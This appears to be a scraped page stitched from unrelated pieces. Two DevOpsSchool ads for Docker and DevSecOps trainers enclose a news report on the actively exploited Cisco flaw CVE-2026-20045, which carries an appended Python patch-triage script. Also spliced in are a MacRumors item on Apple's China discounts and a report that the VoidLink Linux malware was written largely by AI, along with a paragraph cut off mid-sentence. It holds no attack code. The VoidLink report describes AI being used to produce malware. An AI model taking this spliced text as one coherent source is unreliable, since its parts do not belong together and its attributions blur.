Startups in Bangalore rely on Docker Trainers in Bangalore to speed up onboarding and releases. IT services companies adopt Docker to standardize delivery across multiple clients. SaaS platforms use Docker to scale microservices quickly. Developers focus on containerized builds. DevOps engineers manage images and automation. QA teams test consistent environments. Cloud and SRE teams deploy, monitor, and troubleshoot containers. Across industries, Docker training leads to faster releases, fewer environment issues, and predictable deployments.
Why this matters: Real-world use cases prove Docker’s operational value.
Benefits of Using Docker Trainers in Bangalore
Productivity: Teams eliminate environment-related delays.
Reliability: Consistent deployments reduce production issues.
Scalability: Containers support rapid horizontal scaling.
Collaboration: Shared images improve cross-team alignment.
Why this matters: Clear benefits justify Docker training investment.
Challenges, Risks & Common Mistakes
Teams often adopt Docker too quickly without understanding fundamentals. Some create large, inefficient images. Others ignore security best practices. Docker Trainers in Bangalore address these risks by emphasizing simplicity, documentation, and security hygiene from the start. They encourage gradual adoption and disciplined workflows instead of shortcuts.
Why this matters: Awareness prevents fragile container setups and outages.
Comparison Table
Aspect | Traditional Deployment | Docker-Based Deployment
Setup | Manual | Automated
Environment Consistency | Low | High
Portability | Limited | Strong
Scaling | Slow | Fast
Resource Usage | High | Optimized
CI/CD Integration | Complex | Simplified
Rollback | Difficult | Easy
Collaboration | Fragmented | Shared
Cloud Readiness | Partial | Native
Reliability | Variable | Predictable

Why this matters: Comparison highlights why Docker dominates modern delivery.
Best Practices & Expert Recommendations
Effective Docker Trainers in Bangalore stress simplicity first. They promote small images, clear tagging, and version control. They encourage early security scanning and proper secrets management. They align Docker usage with CI/CD goals and orchestration strategies. They also emphasize monitoring and documentation to support operations at scale.
Why this matters: Best practices ensure Docker remains secure and scalable.
Who Should Learn or Use Docker Trainers in Bangalore?
Developers gain skills in containerizing applications. DevOps engineers integrate Docker into CI/CD pipelines. Cloud and SRE teams deploy and manage containers at scale. QA teams benefit from consistent testing environments. Beginners build strong foundations, while experienced professionals optimize delivery pipelines.
Why this matters: Broad relevance strengthens organizational delivery capability.
FAQs – People Also Ask
What are Docker Trainers in Bangalore?
They teach practical Docker skills for real projects.
Why this matters: Clear scope improves learning focus.
Is Docker suitable for beginners?
Yes, structured training simplifies learning.
Why this matters: Beginners gain confidence early.
Does Docker replace virtual machines?
No, Docker complements virtual machines.
Why this matters: Correct understanding avoids misuse.
Is Docker useful in DevOps?
Yes, it supports CI/CD and automation.
Why this matters: DevOps relies on consistency.
Do trainers cover cloud platforms?
Yes, Docker runs on all major clouds.
Why this matters: Cloud compatibility is essential.
Is Docker secure?
Yes, when configured correctly.
Why this matters: Security reduces operational risk.
Can QA teams use Docker?
Yes, for stable test environments.
Why this matters: Consistency improves quality.
Does Docker improve scalability?
Yes, containers scale quickly.
Why this matters: Scalability supports growth.
Is Docker production-ready?
Yes, enterprises use it widely.
Why this matters: Proven adoption builds trust.
Is Docker a valuable career skill?
Yes, demand remains high.
Why this matters: Skills stay relevant.
Branding & Authority
DevOpsSchool is a globally trusted learning platform delivering enterprise-grade DevOps education. Through its structured programs, DevOpsSchool supports professionals and organizations looking for Docker Trainers in Bangalore with hands-on training, real deployment scenarios, and scalable delivery practices. Enterprises rely on this platform because it prioritizes execution, clarity, and measurable outcomes.
Why this matters: Trusted platforms ensure credible and consistent learning.
Rajesh Kumar is a senior mentor with more than 20 years of hands-on industry expertise. Through Rajesh Kumar, learners gain guidance in DevOps, DevSecOps, Site Reliability Engineering, DataOps, AIOps, MLOps, Kubernetes, cloud platforms, CI/CD pipelines, and automation. His mentorship bridges classroom learning with enterprise reality.
Why this matters: Proven mentorship accelerates real-world mastery.
Call to Action & Contact Information
Email: [email protected]
Phone & WhatsApp (India): +91 84094 92687
Phone & WhatsApp (USA): +1 (469) 756-6329
Explore professional Docker training programs designed for modern DevOps and cloud-native delivery teams.
Cisco has released patches for a critical remote code execution vulnerability in its unified communications products that attackers are actively exploiting. The US Cybersecurity and Infrastructure Security Agency has added the flaw to its Known Exploited Vulnerabilities catalog, confirming the exploitation.
Cisco disclosed CVE-2026-20045 along with patches for Unified Communications Manager, Unity Connection, and Webex Calling Dedicated Instance. The company assigned the vulnerability a “Critical” severity rating despite its CVSS score of 8.2.
“Cisco has assigned this security advisory a Security Impact Rating (SIR) of Critical rather than High as the score indicates,” the company said in its advisory. “The reason is that exploitation of this vulnerability could result in an attacker elevating privileges to root.”
CISA’s addition of the vulnerability to its KEV catalog confirms attackers are exploiting it in the wild. “This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise,” CISA said in its alert.
This is the second actively exploited Cisco vulnerability CISA has added to its KEV catalog in recent weeks. Last week, the agency added CVE-2025-20393, affecting Cisco’s AsyncOS software.
“Other collaboration products, including Contact Center Enterprise, Emergency Responder, Finesse, Unified Intelligence Center, and Unified Contact Center Express, are not vulnerable to CVE-2026-20045,” the advisory added.
Root-level compromise with no user interaction
The vulnerability stems from improper validation of user-supplied input in HTTP requests. “An attacker could exploit this vulnerability by sending a sequence of crafted HTTP requests to the web-based management interface of an affected device,” Cisco explained in the advisory. “A successful exploit could allow the attacker to obtain user-level access to the underlying operating system and then elevate privileges to root.”
The attack requires no user interaction and can be carried out by unauthenticated remote attackers, making it particularly dangerous for internet-facing unified communications deployments, the advisory added.
Cisco’s Product Security Incident Response Team added that it is “aware of attempted exploitation of this vulnerability in the wild,” underscoring the urgency of patching.
No workarounds available
Cisco confirmed in the advisory that there are no workarounds or mitigations available for CVE-2026-20045. The company has released fixes specific to each product version.
For Unified Communications Manager, IM&P, SME, and Webex Calling Dedicated Instance running version 14, the company said administrators can upgrade to version 14SU5 or apply a version-specific patch file. Organizations running version 15 can apply version-specific patches for 15SU2 and 15SU3a, with a full release of version 15SU4 expected in March 2026, the company added.
Unity Connection administrators have similar options, with version-specific patch files available for releases 14SU4 and 15SU3.
Organizations still running version 12.5 face a harder choice: Cisco won’t release patches for this version and recommends migrating to a supported release.
“Customers are advised to migrate to a supported release that includes the fix for this vulnerability,” Cisco said in the advisory. Patches are version-specific, and administrators should consult the README files attached to each patch for deployment details, the advisory added.
Federal agencies face a deadline
CISA’s inclusion of CVE-2026-20045 in the KEV catalog triggers mandatory remediation timelines for Federal Civilian Executive Branch agencies under Binding Operational Directive 22-01. Federal agencies must patch the vulnerability within two weeks of its January 21 addition to the catalog.
While BOD 22-01 applies specifically to federal agencies, CISA “strongly recommends” that all organizations treat KEV-listed vulnerabilities as high-priority patching targets. The catalog tracks flaws with confirmed active exploitation, making them significantly more likely to be weaponized against a broader range of targets.
How to patch
Cisco said organizations should check for signs of potential compromise on all internet-accessible instances after applying mitigations. The company advised administrators to review system logs and configurations for any unauthorized changes or suspicious activity that may indicate prior exploitation.
For organizations unable to immediately upgrade to fixed releases, the company said version-specific patch files offer an interim remediation option. However, Cisco noted that patches must match the exact software version running on the device, and administrators should verify compatibility before deployment.
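The version-specific remediation options the article reports above, turned into an added inventory triage helper (example code, not Cisco tooling): it parses release strings in the SU notation used here and classifies each host by the action the article describes. The product and release tables are reconstructed from this article alone, so the Cisco advisory and each patch file's README remain authoritative, and the inventory is constructed sample data.

```python
"""Triage a Cisco Unified Communications inventory against the CVE-2026-20045
remediation options reported above (added example; not Cisco tooling)."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

# Remediation facts as stated in the article. The Cisco advisory and the README
# shipped with each patch file are authoritative; extend these tables from them.
UC_PRODUCTS = {"CUCM", "IM&P", "SME", "WEBEX-CALLING-DI"}
UC_FIXED_SU = {14: 5, 15: 4}                            # 14SU5 has the fix; 15SU4 expected March 2026
UC_PATCH_FILE_RELEASES = {(15, 2, ""), (15, 3, "a")}    # 15SU2 and 15SU3a patch files
UNITY_PATCH_FILE_RELEASES = {(14, 4, ""), (15, 3, "")}  # Unity Connection 14SU4 and 15SU3
END_OF_FIXES_MAJOR = {12}                               # 12.5: no patch will be released; migrate

# Release strings as written in the article: "12.5", "14SU5", "15SU3a".
_RELEASE_RE = re.compile(
    r"^(?P<major>\d+)(?:\.(?P<minor>\d+))?(?:SU(?P<su>\d+)(?P<suffix>[a-z]?))?$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Release:
    major: int
    minor: int
    su: int       # 0 when the base release carries no SU
    suffix: str   # e.g. "a" in 15SU3a, lower-cased


def parse_release(text: str) -> Release:
    """Parse an SU-style release string; raise on anything unrecognised."""
    m = _RELEASE_RE.match(text.strip().replace(" ", ""))
    if m is None:
        raise ValueError(f"unrecognised release string: {text!r}")
    return Release(
        major=int(m["major"]),
        minor=int(m["minor"] or 0),
        su=int(m["su"] or 0),
        suffix=(m["suffix"] or "").lower(),
    )


def triage(product: str, version: str) -> Tuple[str, str]:
    """Classify one host. Returns (status, action) with status one of
    'migrate', 'fixed', 'patch-file', 'upgrade'."""
    rel = parse_release(version)
    prod = product.strip().upper()
    if prod == "UNITY":
        patch_releases, fixed_su = UNITY_PATCH_FILE_RELEASES, {}  # article lists only patch files
    elif prod in UC_PRODUCTS:
        patch_releases, fixed_su = UC_PATCH_FILE_RELEASES, UC_FIXED_SU
    else:
        raise ValueError(f"product not covered by this table: {product!r}")

    if rel.major in END_OF_FIXES_MAJOR:
        return "migrate", f"no fix will be released for {version}; migrate to a supported release"
    target_su = fixed_su.get(rel.major)
    if target_su is not None and rel.su >= target_su:
        return "fixed", f"{rel.major}SU{target_su} or later includes the fix"
    if (rel.major, rel.su, rel.suffix) in patch_releases:
        # Assumption: the release string does not reveal whether the patch file
        # was applied, so this status still needs confirmation on the host.
        return "patch-file", f"version-specific patch file exists for {version}; confirm it is installed"
    upgrade_to = f"{rel.major}SU{target_su}" if target_su else "a release that has a patch file"
    return "upgrade", (f"no patch file listed here for {version}; upgrade to {upgrade_to} "
                       "or apply the patch file for this exact release if Cisco provides one")


def triage_inventory(inventory: Iterable[Tuple[str, str, str]]) -> Dict[str, List[str]]:
    """Group hostnames by triage status. Inventory rows are (host, product, version)."""
    report: Dict[str, List[str]] = {}
    for host, product, version in inventory:
        status, _ = triage(product, version)
        report.setdefault(status, []).append(host)
    return report


# Constructed sample inventory; hostnames and versions are illustrative only.
SAMPLE_INVENTORY = [
    ("cucm-pub-01", "CUCM", "14SU5"),
    ("cucm-sub-02", "CUCM", "15SU3a"),
    ("imp-01", "IM&P", "14SU3"),
    ("unity-01", "Unity", "14SU4"),
    ("cucm-legacy", "CUCM", "12.5"),
]

if __name__ == "__main__":
    for status, hosts in sorted(triage_inventory(SAMPLE_INVENTORY).items()):
        print(f"{status:10s} {', '.join(hosts)}")
```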
Apple is offering discounts of up to 1,000 yuan ($144) on some products in China in anticipation of a holiday shopping rush and competitive pricing from local vendors, reports the South China Morning Post.


Ahead of February's Lunar New Year, Apple's mainland China website and official stores are offering limited-time discounts on products including the iPhone 16 and iPhone 16 Plus, as well as some MacBook, iPad, Apple Watch, and AirPods models. The discounts come into effect between January 24 and January 27.

Apple led the Chinese smartphone market in the fourth quarter of 2025 with a 22 percent share, thanks to strong iPhone 17 sales. Despite the demand, sales are said to have been falling month on month, and the promotions are aimed at countering the decline.

China's smartphone market shrank 1.6 percent year on year in Q4 2025, while full-year shipments declined 0.6 percent. Counterpoint analysts have put the decline down to weak demand amid rising prices and global memory shortages.

Chinese government policies appear to have played a role too. Under government subsidies, consumers get a 15% refund on electronics priced under 6,000 yuan ($820). Apple partly missed out on the program, since its iPhone Pro models exceed the price cutoff, giving its local rivals an edge.
This article, "Apple Responds to Slowing China Sales With Lunar New Year Discounts" first appeared on MacRumors.com
VoidLink, the high-impact Linux malware framework disclosed last week, is back under scrutiny for claims that the bulk of its development was done by artificial intelligence (AI).
According to the follow-up analysis from Check Point Research (CPR), which first disclosed VoidLink, the malware was not merely assisted by AI tooling but was largely planned, structured, and written through AI-driven processes.
“CPR believes a new era of AI-generated malware has begun,” the researchers said in a blog post. “VoidLink stands as the first evidently documented case of this era, as a truly advanced malware framework authored almost entirely by AI, likely under the direction of a single individual.”
VoidLink was initially disclosed as a modular Linux malware framework capable of operating across cloud and containerized environments. If AI was indeed its primary author, the researchers noted, months of engineering work were compressed into a matter of days.
While no active large-scale exploitation tied to VoidLink has yet been reported, the prospect of a much lower barrier to producing complex malware at speed could be concerning for defenders.
Evidence points to AI-led development
Check Point researchers traced VoidLink’s origins to late 2025, when early development samples began appearing in telemetry. What stood out was not just the malware’s modular design, but the presence of structured development documentation typically associated with organized software projects.
The researchers identified sprint-style plans, detailed technical specifications, and task breakdowns that appeared to be generated programmatically rather than authored manually. Code comments, architectural consistency, and repetitive implementation patterns further suggested that an AI system was responsible for producing large portions of the framework.
Additionally, as per Check Point’s analysis, VoidLink grew to tens of thousands of lines of code in under a week, a pace that would be difficult for even a skilled development team to sustain. While a human operator likely guided the process, AI handled much of the execution, generating code, refining modules, and accelerating iteration cycles.
Unlike previous examples of AI-assisted malware, which often relied on basic scripts and reused open-source components, AI appears to have driven the end-to-end development of VoidLink.
What VoidLink signals for enterprise security
Check Point’s analysis frames the malware as an important indicator of how threat development itself is changing. The researchers emphasize that the significance of VoidLink lies less in its current deployment and more in how quickly it was created using AI-driven processes.
VoidLink is designed to operate on Linux systems commonly found in servers, cloud workloads, and containerized environments. Its modular structure allows components to be developed, replaced, or extended independently, a design choice that aligns with long-term development rather than a single-use attack. According to the researchers, this approach reflects a level of planning typically associated with well-resourced threat actors.
It was also emphasized that AI-assisted development significantly reduced the time and effort required to produce a complex malware framework like VoidLink. What would normally require coordinated teams and extended development cycles was condensed into a rapid, largely automated process.
This lowers the barrier to creating sophisticated malware and may enable smaller or less experienced actors to build tools previously out of reach, the researchers argued. While mitigation efforts around VoidLink continue to focus on hardening Linux and cloud environments, improving runtime visibility, and detecting suspicious or unknown binaries, Check Point cautioned that the broader risk extends beyond this single framework.
The development techniques observed in VoidLink, particularly extensive use of AI to plan and generate malware components, could be easily replicated, potentially shortening development cycles of future threats.
Security teams at agile, fast-growing companies often have the same mandate: secure the business without slowing it down. Most teams inherit a tech stack optimized for breakneck growth, not resilience. In these environments, the security team is the helpdesk, the compliance expert, and the incident response team all rolled into one. Securing the cloud office in this scenario is all about
Introduction: Problem, Context & Outcome
Software teams deliver features faster than ever, yet security still struggles to keep pace. Many engineers focus on speed first and push security checks to the end of the release cycle. Consequently, vulnerabilities appear late, fixing them becomes expensive, and deployment confidence drops. Meanwhile, organizations continue adopting cloud platforms, CI/CD pipelines, and Agile development at scale. This evolution increases attack surfaces and compliance pressure at the same time. Teams now need security embedded directly into DevOps workflows rather than handled separately. DevSecOps Trainers solve this challenge by teaching teams how to integrate security into every phase of delivery. In this blog, you will discover what DevSecOps Trainers do, why they play a critical role today, and how their guidance helps teams deliver secure software without slowing down innovation.
Why this matters: Early security integration protects systems while maintaining delivery speed.
What Are DevSecOps Trainers?
DevSecOps Trainers are seasoned professionals who teach teams how to embed security into DevOps practices from day one. Instead of treating security as a final audit, they show how it becomes a shared responsibility across development, operations, and security teams. These trainers guide developers on secure coding habits, help DevOps engineers protect CI/CD pipelines, and support QA teams in validating security controls continuously. DevSecOps Trainers also focus on cloud security, infrastructure protection, and automated compliance. In real organizations, they work with startups, enterprises, and regulated industries to reduce risk without disrupting delivery. Their approach blends culture, process, and automation rather than relying on manual approvals or isolated security tools.
Why this matters: A clear DevSecOps approach turns security into a delivery strength, not a bottleneck.
Why DevSecOps Trainers Are Important in Modern DevOps & Software Delivery
Modern software delivery demands rapid innovation while maintaining trust and resilience. At the same time, cyber threats continue to grow in complexity and frequency. DevSecOps Trainers help organizations manage this balance. They address challenges like late vulnerability detection, manual security gates, and inconsistent compliance practices. Furthermore, they align security with CI/CD pipelines, cloud infrastructure, Agile planning, and DevOps collaboration. Without structured training, teams often bolt security onto pipelines in ineffective ways. With expert trainers, teams integrate automated security checks early and consistently. As organizations scale cloud-native and microservices architectures, DevSecOps Trainers become essential for building secure and reliable delivery systems.
Why this matters: Proactive security enables fast delivery without compromising trust.
Core Concepts & Key Components
Shift-Left Security
Purpose: Identify and resolve security issues early.
How it works: Trainers integrate security checks into coding and build stages.
Where it is used: Source code repositories and CI pipelines.
Secure CI/CD Pipelines
Purpose: Protect the delivery pipeline itself.
How it works: Trainers teach secrets management, access control, and pipeline hardening.
Where it is used: Jenkins, GitLab CI, GitHub Actions, cloud CI tools.
Cloud and Infrastructure Security
Purpose: Secure underlying infrastructure and configurations.
How it works: Trainers enforce policies and secure defaults automatically.
Where it is used: AWS, Azure, Google Cloud platforms.
Continuous Compliance
Purpose: Maintain regulatory and policy alignment.
How it works: Trainers automate compliance checks and generate audit-ready reports.
Where it is used: Finance, healthcare, enterprise IT environments.
Runtime Monitoring and Threat Detection
Purpose: Detect risks in live systems.
How it works: Trainers implement logs, alerts, and runtime protection.
Where it is used: Production environments and SRE workflows.
Why this matters: These components reduce risk across the entire software lifecycle.
How DevSecOps Trainers Work (Step-by-Step Workflow)
DevSecOps Trainers follow a structured and practical workflow. First, they assess current delivery pipelines and security maturity. Next, they introduce DevSecOps principles using real operational examples instead of abstract theory. Then, they map security controls to each DevOps lifecycle stage. Teams learn how to add automated scans, manage secrets, and enforce policies. Trainers emphasize rapid feedback through alerts and reports. Finally, teams adopt continuous improvement by regularly reviewing threats and controls. This step-by-step approach keeps security practical and scalable.
Why this matters: A clear workflow makes security repeatable and manageable.
Real-World Use Cases & Scenarios
Financial organizations use DevSecOps Trainers to meet strict compliance requirements. SaaS companies rely on them to secure shared cloud platforms. E-commerce teams adopt DevSecOps to protect customer data and transactions. Developers focus on writing secure code. DevOps engineers harden pipelines and infrastructure. QA teams validate security early. SRE teams monitor runtime threats. Cloud teams enforce governance policies. Across industries, DevSecOps training reduces incidents while preserving fast release cycles.
Why this matters: Real-world use cases prove that security and speed can coexist.
Benefits of Using DevSecOps Trainers
Productivity: Teams avoid late-stage security rework
Reliability: Secure systems reduce outages and incidents
Scalability: Automated controls support growth
Collaboration: Shared ownership builds trust across teams
Why this matters: Tangible benefits justify sustained DevSecOps investment.
Challenges, Risks & Common Mistakes
Many teams approach DevSecOps as only a tooling exercise. Others overload pipelines with scans that slow delivery. Some teams ignore cultural change altogether. DevSecOps Trainers address these risks by focusing on fundamentals first, automation second, and culture throughout. They help teams prioritize risks realistically and avoid unnecessary complexity.
Why this matters: Awareness prevents burnout and ineffective security practices.
Comparison Table
Aspect | Traditional Security | DevSecOps
Security Timing | Late-stage | Continuous
Responsibility | Centralized | Shared
Automation Level | Low | High
Feedback Speed | Slow | Fast
Compliance | Manual | Automated
Scalability | Limited | High
Cloud Readiness | Partial | Native
Collaboration | Minimal | Strong
Risk Visibility | Low | High
Delivery Speed | Slow | Fast
Why this matters: The comparison highlights why DevSecOps outperforms traditional security models.
Best Practices & Expert Recommendations
Effective DevSecOps Trainers start with education and awareness. They integrate security incrementally rather than all at once. They automate only what teams understand. They align security metrics with business outcomes. They also document processes clearly and maintain feedback loops. This balanced strategy ensures long-term success and adoption.
Why this matters: Best practices keep security sustainable and effective.
Who Should Learn or Use DevSecOps Trainers?
Developers build secure coding habits early. DevOps engineers protect pipelines and infrastructure. Cloud engineers enforce security policies. QA teams validate controls continuously. SRE teams manage runtime risks. Beginners gain structure, while experienced professionals optimize security at scale.
Why this matters: Broad adoption strengthens organizational security posture.
FAQs – People Also Ask
What are DevSecOps Trainers?
They teach how to integrate security into DevOps workflows.
Why this matters: Clear roles support faster adoption.
Is DevSecOps suitable for beginners?
Yes, trainers adjust learning paths based on experience.
Why this matters: Beginners learn safely and confidently.
Does DevSecOps slow down development?
No, automation speeds up secure delivery.
Why this matters: Speed remains competitive.
Is DevSecOps important for cloud environments?
Yes, cloud systems require continuous security.
Why this matters: Cloud risk increases without automation.
Do DevSecOps Trainers teach tools?
Yes, alongside core concepts.
Why this matters: Balance ensures understanding.
Is DevSecOps relevant for DevOps engineers?
Yes, it extends DevOps responsibilities.
Why this matters: Roles evolve continuously.
Does DevSecOps help with compliance?
Yes, through automated checks.
Why this matters: Compliance becomes manageable.
Can QA teams benefit from DevSecOps?
Yes, they validate security early.
Why this matters: Quality improves sooner.
Is DevSecOps expensive to implement?
No, prevention reduces long-term costs.
Why this matters: Risk reduction saves money.
Is DevSecOps future-proof?
Yes, demand continues to grow.
Why this matters: Skills remain relevant.
Branding & Authority
DevOpsSchool is a globally trusted education platform delivering enterprise-grade training in DevOps and security practices. Through structured programs, DevOpsSchool supports organizations and professionals searching for DevSecOps Trainers with hands-on learning, real-world scenarios, and scalable frameworks. Enterprises rely on this platform because it emphasizes execution, clarity, and measurable outcomes.
Why this matters: Trusted platforms ensure learning credibility and consistency.
Rajesh Kumar acts as a senior mentor with more than 20 years of hands-on industry experience. Through Rajesh Kumar, learners gain guidance across DevOps, DevSecOps, Site Reliability Engineering, DataOps, AIOps, MLOps, Kubernetes, cloud platforms, CI/CD pipelines, and automation. His mentorship bridges theory with enterprise execution.
Why this matters: Proven expertise accelerates real-world mastery.
Call to Action & Contact Information
Email: [email protected]
Phone & WhatsApp (India): +91 84094 92687
Phone & WhatsApp (USA): +1 (469) 756-6329
Explore secure, scalable DevSecOps training programs designed for modern enterprise delivery.